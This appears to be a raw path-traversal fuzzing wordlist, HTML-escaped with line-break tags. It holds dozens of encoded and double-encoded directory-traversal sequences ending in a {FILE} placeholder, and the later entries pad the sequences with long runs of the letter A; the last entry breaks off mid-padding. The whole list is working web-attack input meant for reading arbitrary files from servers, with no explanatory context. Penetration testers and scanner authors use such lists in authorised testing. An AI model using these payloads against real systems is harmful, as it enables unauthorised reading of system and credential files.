..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA